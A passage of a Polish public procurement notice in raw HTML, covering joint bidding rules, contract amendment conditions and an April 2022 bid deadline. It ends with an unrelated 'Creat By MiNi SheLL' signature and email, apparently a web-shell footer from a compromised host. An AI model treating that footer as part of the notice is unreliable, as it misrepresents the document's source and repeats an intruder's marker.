Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia. W takim<br/>przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego zgodnie z art. 58 ust. 2 ustawy PZP:1.1. Pełnomocnikiem może być<br/>jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców). 1.2. Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący<br/>osobą prawną to może on działać zgodnie z ujawnionymi w dokumentach rejestrowych<br/>zasadami reprezentacji.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców Oświadczenie Wstępne składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.3. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienie<br/>brak podstaw do wykluczenia z postępowania powinien wykazać każdy z wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W przypadku zmiany przepisów dotyczących wysokości podatku VAT w czasie obowiązywania<br/>niniejszej umowy ceny brutto nie będące cenami urzędowymi w myśl ustawy o refundacji z dnia<br/>12 maja 2011 r.. Ceny brutto ulegną zmianie stosownie do zmiany stawki podatku VAT,<br/>natomiast cena netto pozostanie niezmienna. Powyższe nie dotyczy przypadków, gdy<br/>Wykonawca nieprawidłowo ustalił stawki podatku VAT w ofercie, w takim wypadku skutki<br/>nieprawidłowego wskazania stawki podatku obciążają wyłącznie Wykonawcę. Nie dotyczy to<br/>przypadków zawyżenia stawki VAT w ofercie. W przypadkach wątpliwości co do wysokości<br/>stawki VAT Wykonawca obowiązany jest przedstawić Zamawiającemu urzędową interpretację<br/>właściwych organów skarbowych.<br/>3. Zmiana cen, o których mowa w ust. 2 obowiązuje od zmiany umowy w postaci aneksu ze<br/>skutkiem od dnia wejścia w życie odpowiednich przepisów.<br/>4. Strona występująca z inicjatywą zmiany cen zobowiązana jest każdorazowo uprzedzić<br/>pisemnie drugą Stronę o zamiarze zmiany cen przestawiając dokumenty uzasadniające<br/>wprowadzenie nowych cen.<br/>Par. 9 Projektu umowy:<br/>Poza przypadkami wcześniej wymienionymi w niniejszej umowie Zamawiający przewiduje<br/>możliwość zmiany niniejszej umowy w przypadku wystąpienia sytuacji trudnej do przewidzenia w<br/>chwili zawarcia umowy tj.:<br/>1. jeżeli w czasie realizacji umowy producent danego przedmiotu zamówienia zaprzestanie<br/>produkcji opakowań w zaoferowanej ilości/pojemności, Zamawiający dopuszcza zmianę ilości<br/>sztuk przedmiotu zamówienia w opakowaniu po uprzednim powiadomieniu pisemnym<br/>Zamawiającego o proponowanej zmianie i wyrażeniu zgody na taką zmianę przez<br/>Zamawiającego (po podpisaniu aneksu do umowy). W każdym przypadku zmiany ilości sztuk w<br/>opakowaniu cena jednostkowa netto w przeliczeniu proporcjonalnym tego przedmiotu<br/>zamówienia nie może ulec zmianie. <br/>Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>2. jeżeli w czasie realizacji umowy:<br/>- producent przedmiotu zamówienia wskazanego w umowie - w nazwie handlowej, zaprzestanie<br/>jego produkcji lub<br/>- przedmiot zamówienia wskazany w umowie - w nazwie handlowej, będzie niedostępny na<br/>rynku polskim, to możliwe będzie jego zastąpienie odpowiednikiem po pisemnym powiadomieniu<br/>Zamawiającego (po podpisaniu aneksu do umowy) i wyrażeniu zgody na takie zastąpienie, z<br/>zachowaniem terminu dostawy i ceny jednostkowej netto, jak w ofercie lub ceny jednostkowej<br/>niższej.<br/>3. jeżeli w czasie realizacji umowy zmianie ulegnie nazwa handlowa przedmiotu zamówienia<br/>objętego umową Zamawiający dopuszcza taką zmianę po uprzednim powiadomieniu pisemnym<br/>Zamawiającego o dokonanej przez producenta zmianie i wyrażeniu zgody na taką zmianę przez<br/>Zamawiającego (po podpisaniu aneksu do umowy). W każdym przypadku zmiany nazwy<br/>handlowej cena jednostkowa netto tego przedmiotu zamówienia nie może ulec zmianie w górę.<br/>4. jeżeli w czasie realizacji umowy zmianie ulegnie nazwa Wykonawcy jego stan prawny lub<br/>adres siedziby Wykonawcy Wykonawca zobowiązany jest do powiadomienia Zamawiającego o<br/>takiej zmianie i przedstawienia aneksu do Umowy wraz z aktualnym odpisem z właściwego<br/>rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, podpisanym „za zgodność z<br/>oryginałem” przez uprawnione osoby.<br/>5. jeżeli w czasie realizacji umowy zmianie ulegnie nazwa Zamawiającego, jego stan prawny lub<br/>adres siedziby Zamawiającego Zamawiający zobowiązany jest do powiadomienia Wykonawcy o<br/>takiej zmianie i przedstawienia aneksu do Umowy.<br/>Par. 10 ust 2. 2. W przypadku niezrealizowania przedmiotu zamówienia w całości strony mogą<br/>zgodnie postanowić o przedłużeniu terminu obowiązywania niniejszej umowy do czasu<br/>całkowitego zrealizowania łącznej kwoty umowy, nie dłużej jednak niż o 3 miesiące.<br/>Przedłużeniem umowy wymaga pisemnego aneksu. Powyższe nie uchybia uprawnieniom<br/>Zamawiającego, o których mowa w § 1 ust.4. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com